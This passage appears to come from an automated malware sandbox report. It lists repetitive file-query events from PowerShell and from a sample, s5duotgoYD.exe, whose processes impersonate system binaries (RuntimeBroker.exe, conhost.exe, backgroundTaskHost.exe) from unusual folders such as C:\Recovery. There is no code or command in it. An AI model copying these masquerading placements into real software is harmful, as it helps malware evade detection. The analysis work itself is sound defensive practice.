                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeQueries volume information: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeQueries volume information: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\ModemLogs\conhost.exeQueries volume information: C:\Windows\ModemLogs\conhost.exe VolumeInformation
                              Source: C:\Windows\ModemLogs\conhost.exeQueries volume information: C:\Windows\ModemLogs\conhost.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeQueries volume information: C:\Users\user\Desktop\s5duotgoYD.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeQueries volume information: C:\Users\user\Desktop\s5duotgoYD.exe VolumeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exeQueries volume information: C:\Recovery\xKVBpkhCEjg.exe VolumeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exeQueries volume information: C:\Recovery\xKVBpkhCEjg.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
